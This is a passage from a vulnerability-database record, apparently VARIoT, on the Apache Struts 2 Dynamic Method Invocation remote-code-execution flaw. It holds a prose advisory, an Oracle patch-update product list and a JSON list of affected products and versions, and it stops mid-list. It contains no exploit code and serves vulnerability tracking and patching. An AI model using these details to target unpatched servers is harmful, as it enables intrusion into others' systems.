Apache Struts 2.3.19 to 2.3.20.2, 2.3.21 to 2.3.24.1, and 2.3.25 to 2.3.28, when Dynamic Method Invocation is enabled, allow remote attackers to execute arbitrary code via method: prefix, related to chained expressions. Apache Struts2 Contains a vulnerability that allows execution of arbitrary code. Note that this vulnerability was used proof-of-concept The code has been released. National Vulnerability Database (NVD) Then CWE-77 It is published as CWE-77: Improper Neutralization of Special Elements used in a Command ( Command injection ) http://cwe.mitre.org/data/definitions/77.htmlA remote attacker could execute arbitrary code on the server where the product is running. Apache Struts is prone to a remote code-execution vulnerability. Failed exploit attempts may cause a denial-of-service condition. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software: Oracle Application Express Oracle Database Server Oracle Access Manager Oracle BI Publisher Oracle Business Intelligence Enterprise Edition Oracle Directory Server Enterprise Edition Oracle Exalogic Infrastructure Oracle Fusion Middleware Oracle GlassFish Server Oracle HTTP Server Oracle JDeveloper Oracle Portal Oracle WebCenter Sites Oracle WebLogic Server Outside In Technology Hyperion Financial Reporting Enterprise Manager Base Platform Enterprise Manager for Fusion Middleware Enterprise Manager Ops Center Oracle E-Business Suite Oracle Agile Engineering Data Management Oracle Agile PLM Oracle Demand Planning Oracle Engineering Data Management Oracle Transportation Management PeopleSoft Enterprise FSCM PeopleSoft Enterprise PeopleTools JD Edwards EnterpriseOne Tools Siebel Applications Oracle Fusion Applications Oracle Communications ASAP Oracle Communications Core Session Manager Oracle Communications EAGLE Application Processor Oracle Communications Messaging Server Oracle Communications Network Charging and Control Oracle Communications Operations Monitor Oracle Communications Policy Management Oracle Communications Session Border Controller Oracle Communications Unified Session Manager Oracle Enterprise Communications Broker Oracle Banking Platform Oracle Financial Services Lending and Leasing Oracle FLEXCUBE Direct Banking Oracle Health Sciences Clinical Development Center Oracle Health Sciences Information Manager Oracle Healthcare Analytics Data Integration Oracle Healthcare Master Person Index Oracle Documaker Oracle Insurance Calculation Engine Oracle Insurance Policy Administration J2EE Oracle Insurance Rules Palette MICROS Retail XBRi Loss Prevention Oracle Retail Central Oracle Back Office Oracle Returns Management Oracle Retail Integration Bus Oracle Retail Order Broker Oracle Retail Service Backbone Oracle Retail Store Inventory Management Oracle Utilities Framework Oracle Utilities Network Management System Oracle Utilities Work and Asset Management Oracle In-Memory Policy Analytics Oracle Policy Automation Oracle Policy Automation Connector for Siebel Oracle Policy Automation for Mobile Devices Primavera Contract Management Primavera P6 Enterprise Project Portfolio Management Oracle Java SE Oracle Java SE Embedded Oracle JRockit 40G 10G 72/64 Ethernet Switch Fujitsu M10-1 Servers Fujitsu M10-4 Servers Fujitsu M10-4S Servers ILOM Oracle Switch ES1-24 Solaris Solaris Cluster SPARC Enterprise M3000 Servers SPARC Enterprise M4000 Servers SPARC Enterprise M5000 Servers SPARC Enterprise M8000 Servers SPARC Enterprise M9000 Servers Sun Blade 6000 Ethernet Switched NEM 24P 10GE Sun Data Center InfiniBand Switch 36 Sun Network 10GE Switch 72p Sun Network QDR InfiniBand Gateway Switch Oracle Secure Global Desktop Oracle VM VirtualBox MySQL Server Exploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", affected_products: { "@id": "https://www.variotdbs.pl/ref/affected_products", }, configurations: { "@id": "https://www.variotdbs.pl/ref/configurations", }, credits: { "@id": "https://www.variotdbs.pl/ref/credits", }, cvss: { "@id": "https://www.variotdbs.pl/ref/cvss/", }, description: { "@id": "https://www.variotdbs.pl/ref/description/", }, exploit_availability: { "@id": "https://www.variotdbs.pl/ref/exploit_availability/", }, external_ids: { "@id": "https://www.variotdbs.pl/ref/external_ids/", }, iot: { "@id": "https://www.variotdbs.pl/ref/iot/", }, iot_taxonomy: { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/", }, patch: { "@id": "https://www.variotdbs.pl/ref/patch/", }, problemtype_data: { "@id": "https://www.variotdbs.pl/ref/problemtype_data/", }, references: { "@id": "https://www.variotdbs.pl/ref/references/", }, sources: { "@id": "https://www.variotdbs.pl/ref/sources/", }, sources_release_date: { "@id": "https://www.variotdbs.pl/ref/sources_release_date/", }, sources_update_date: { "@id": "https://www.variotdbs.pl/ref/sources_update_date/", }, threat_type: { "@id": "https://www.variotdbs.pl/ref/threat_type/", }, title: { "@id": "https://www.variotdbs.pl/ref/title/", }, type: { "@id": "https://www.variotdbs.pl/ref/type/", }, }, "@id": "https://www.variotdbs.pl/vuln/VAR-201604-0434", affected_products: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { model: "struts", scope: "eq", trust: 1.9, vendor: "apache", version: "2.3.14", }, { model: "struts", scope: "eq", trust: 1.9, vendor: "apache", version: "2.2.3.1", }, { model: "struts", scope: "eq", trust: 1.9, vendor: "apache", version: "2.3.1", }, { model: "struts", scope: "eq", trust: 1.9, vendor: "apache", version: "2.3.14.1", }, { model: "struts", scope: "eq", trust: 1.9, vendor: "apache", version: "2.2.3", }, { model: "struts", scope: "eq", trust: 1.9, vendor: "apache", version: "2.3.1.2", }, { model: "struts", scope: "eq", trust: 1.9, vendor: "apache", version: "2.3.14.2", }, { model: "struts", scope: "eq", trust: 1.9, vendor: "apache", version: "2.3.14.3", }, { model: "struts", scope: "eq", trust: 1.6, vendor: "apache", version: "2.2.1", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 1.4, vendor: "oracle", version: "10.0.1", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 1.4, vendor: "oracle", version: "10.8.1", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.3.16.2", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.0.12", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.0.10", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.0.11.1", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.1.8", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.0.2", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.3.20.1", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.1.4", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.0.8", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.1.1", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.3.16.3", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.3.20", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.3.1.1", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.0.1", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.1.2", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.3.15", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.0.4", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.3.28", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.3.24", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.3.8", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.0.3", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.1.5", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.0.13", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.0.11", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.3.15.2", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.3.4", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.0.6", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.3.15.1", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.3.15.3", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.1.3", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.3.16", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.1.8.1", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.1.6", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.3.7", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.0.7", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.0.5", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.0.14", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.3.16.1", }, { model: "struts", scope: "eq", trust: 1.3, vendor: "apache", version: "2.0.9", }, { model: "flexcube private banking", scope: "eq", trust: 1.1, vendor: "oracle", version: "12.0.1", }, { model: "flexcube private banking", scope: "eq", trust: 1.1, vendor: "oracle", version: "2.0.1", }, { model: "flexcube private banking", scope: "eq", trust: 1.1, vendor: "oracle", version: "12.0.3", }, { model: "struts", scope: "eq", trust: 1, vendor: "apache", version: "2.1.0", }, { model: "struts", scope: "eq", trust: 1, vendor: "apache", version: "2.2.1.1", }, { model: "struts", scope: "eq", trust: 1, vendor: "apache", version: "2.0.0", }, { model: "struts", scope: "eq", trust: 1, vendor: "apache", version: "2.0.11.2", }, { model: "struts", scope: "eq", trust: 1, vendor: "apache", version: "2.3.3", }, { model: "struts", scope: "eq", trust: 1, vendor: "apache", version: "2.3.4.1", }, { model: "struts", scope: "eq", trust: 1, vendor: "apache", version: "2.3.12", }, { model: "siebel e-billing", scope: "eq", trust: 1, vendor: "oracle", version: "7.1", }, { model: "struts", scope: "eq", trust: 1, vendor: "apache", version: "2.3.24.1", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.092", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.091", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.7.0101", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.6.0115", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.092", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.091", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.7.0101", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.6.0115", }, { model: "struts", scope: "lte", trust: 0.8, vendor: "apache", version: "2.3.20 from 2.3.28 (struts 2.3.20.3 and struts 2.3.24.3 except for )", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.8, vendor: "oracle", version: "10.5.0", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.8, vendor: "oracle", version: "10.6.0", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.8, vendor: "oracle", version: "10.7.0", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.8, vendor: "oracle", version: "10.8.0", }, { model: "flexcube private banking", scope: "eq", trust: 0.8, vendor: "oracle", version: "12.1.0", }, { model: "flexcube private banking", scope: "eq", trust: 0.8, vendor: "oracle", version: "2.0.0", }, { model: "flexcube private banking", scope: "eq", trust: 0.8, vendor: "oracle", version: "2.2.0", }, { model: "siebel", scope: "eq", trust: 0.8, vendor: "oracle", version: "of siebel apps - e-billing 7.1", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.6, vendor: "oracle", version: "10.7", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.6, vendor: "oracle", version: "10.5", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.6, vendor: "oracle", version: "10.8", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.6, vendor: "oracle", version: "10.6", }, { model: "infosphere metadata workbench", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "oceanstor n8500 v200r001c09spc506", scope: "ne", trust: 0.3, vendor: "huawei", version: null, }, { model: "oceanstor onebox v100r003c10", scope: null, trust: 0.3, vendor: "huawei", version: null, }, { model: "infosphere information server", scope: "eq", trust: 0.3, vendor: "ibm", version: "11.5", }, { model: "infosphere information server", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "struts", scope: "ne", trust: 0.3, vendor: "apache", version: "2.3.20.2", }, { model: "struts", scope: "eq", trust: 0.3, vendor: "apache", version: "2.0", }, { model: "agile controller-campus v100r002c00", scope: null, trust: 0.3, vendor: "huawei", version: null, }, { model: "oceanstor v300r003c10spc100", scope: "ne", trust: 0.3, vendor: "huawei", version: "18800v3", }, { model: "oceanstor v300r003c10", scope: "ne", trust: 0.3, vendor: "huawei", version: "5600", }, { model: "oceanstor v100r001c01", scope: "eq", trust: 0.3, vendor: "huawei", version: "9000", }, { model: "oceanstor v300r003c10spc100", scope: "ne", trust: 0.3, vendor: "huawei", version: "18500v3", }, { model: "infosphere information governance catalog", scope: "eq", trust: 0.3, vendor: "ibm", version: "11.3", }, { model: "oceanstor n8500 v200r001c91spc900", scope: null, trust: 0.3, vendor: "huawei", version: null, }, { model: "flexcube private banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2", }, { model: "anyoffice v200r006c00", scope: null, trust: 0.3, vendor: "huawei", version: null, }, { model: "oceanstor v300r003c10", scope: "ne", trust: 0.3, vendor: "huawei", version: "5300", }, { model: "oceanstor v300r003c00", scope: "eq", trust: 0.3, vendor: "huawei", version: "5300v3", }, { model: "oceanstor onebox v100r005c00", scope: "ne", trust: 0.3, vendor: "huawei", version: null, }, { model: "oceanstor v300r003c10", scope: "ne", trust: 0.3, vendor: "huawei", version: "5500", }, { model: "siebel apps e-billing", scope: "eq", trust: 0.3, vendor: "oracle", version: "-7.1", }, { model: "oceanstor v300r003c10", scope: "ne", trust: 0.3, vendor: "huawei", version: "5800", }, { model: "oceanstor", scope: "eq", trust: 0.3, vendor: "huawei", version: "5800v30", }, { model: "flexcube private banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "agile controller-campus v100r002c00spc107", scope: "ne", trust: 0.3, vendor: "huawei", version: null, }, { model: "struts", scope: "eq", trust: 0.3, vendor: "apache", version: "2.3.41", }, { model: "logcenter v100r001c20spc102", scope: "ne", trust: 0.3, vendor: "huawei", version: null, }, { model: "oceanstor v300r003c10", scope: "ne", trust: 0.3, vendor: "huawei", version: "5800v3", }, { model: "flexcube private banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "anyoffice emm v200r006c00spc101", scope: "ne", trust: 0.3, vendor: "huawei", version: null, }, { model: "oceanstor v300r001c20", scope: "eq", trust: 0.3, vendor: "huawei", version: "5300v3", }, { model: "oceanstor v300r003c10", scope: "eq", trust: 0.3, vendor: "huawei", version: "18500v3", }, { model: "oceanstor n8500 v200r001c09", scope: null, trust: 0.3, vendor: "huawei", version: null, }, { model: "infosphere information governance catalog", scope: "eq", trust: 0.3, vendor: "ibm", version: "11.5", }, { model: "oceanstor v300r005c00", scope: "eq", trust: 0.3, vendor: "huawei", version: "9000", }, { model: "infosphere metadata workbench", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.1", }, { model: "infosphere information server", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.1", }, { model: "firehunter6000 v100r001c20", scope: null, trust: 0.3, vendor: "huawei", version: null, }, { model: "infosphere metadata workbench", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.7", }, { model: "oceanstor n8500 v200r001c91spc205", scope: null, trust: 0.3, vendor: "huawei", version: null, }, { model: "agile controller-campus v100r002c00spc106t", scope: "ne", trust: 0.3, vendor: "huawei", version: null, }, { model: "oceanstor n8500 v200r001c91spc902", scope: "ne", trust: 0.3, vendor: "huawei", version: null, }, { model: "infosphere information server", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.7", }, { model: "oceanstor v300r003c10", scope: "ne", trust: 0.3, vendor: "huawei", version: "6800v3", }, { model: "struts", scope: "eq", trust: 0.3, vendor: "apache", version: "2.2", }, { model: "struts", scope: "eq", trust: 0.3, vendor: "apache", version: "2.1", }, { model: "oceanstor v300r003c10", scope: "eq", trust: 0.3, vendor: "huawei", version: "18800", }, { model: "oceanstor n8500 v200r001c91spc901", scope: null, trust: 0.3, vendor: "huawei", version: null, }, { model: "logcenter v100r001c20", scope: null, trust: 0.3, vendor: "huawei", version: null, }, { model: "struts", scope: "ne", trust: 0.3, vendor: "apache", version: "2.3.24.2", }, { model: "struts", scope: "eq", trust: 0.3, vendor: "apache", version: "2.2.11", }, { model: "oceanstor v100r001c30", scope: "eq", trust: 0.3, vendor: "huawei", version: "9000", }, { model: "infosphere information server", scope: "eq", trust: 0.3, vendor: "ibm", version: "11.3", }, { model: "flexcube private banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.2", }, { model: "oceanstor v300r002c10", scope: "eq", trust: 0.3, vendor: "huawei", version: "5300v3", }, { model: "oceanstor n8500 v200r001c91", scope: null, trust: 0.3, vendor: "huawei", version: null, }, { model: "anyoffice v200r005c00", scope: null, trust: 0.3, vendor: "huawei", version: null, }, { model: "oceanstor n8500 v200r001c09spc505", scope: null, trust: 0.3, vendor: "huawei", version: null, }, { model: "firehunter6000 v100r001c20spc106t", scope: "ne", trust: 0.3, vendor: "huawei", version: null, }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3.60", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0", }, { model: "webcenter sites", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.18.0", }, { model: "webcenter sites", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.16", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.14", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.13", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.12", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.11", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.10", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.9", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.8", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.18", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0", }, { model: "utilities work and asset management", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.9.1.2.8", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.3.5", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.2.12", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.1.16", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.11.0.5.4", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.11.0.4.41", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.10.0.6.27", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.3.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2.0.0.0", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.4.1", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.4", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.5", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.4", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.3", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.2", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.1", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.7", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.6", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3", }, { model: "switch es1-24", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.3", }, { model: "sun network qdr infiniband gateway switch", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "sun network 10ge switch 72p", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.2", }, { model: "sun data center infiniband switch", scope: "eq", trust: 0.3, vendor: "oracle", version: "362.2.2", }, { model: "sun blade ethernet switched nem 24p 10ge", scope: "eq", trust: 0.3, vendor: "oracle", version: "60001.2", }, { model: "sparc enterprise m9000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m9000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m8000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m8000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m5000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m5000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m4000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m4000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m3000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m3000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "solaris cluster", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3", }, { model: "solaris cluster", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.3", }, { model: "solaris", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.3", }, { model: "solaris", scope: "eq", trust: 0.3, vendor: "oracle", version: "10", }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.2.2", }, { model: "siebel applications ip2016", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications ip2015", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications ip2014", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5", }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.1.1", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.2", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.71", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.63", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.2", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.1", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.4", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.3", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.1", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.2", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.1", }, { model: "primavera contract management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.2", }, { model: "portal", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.16.0", }, { model: "policy automation for mobile devices", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.6", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.5", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.4", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.3", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.2", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.1", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.6", }, { model: "policy automation", scope: "eq", trust: 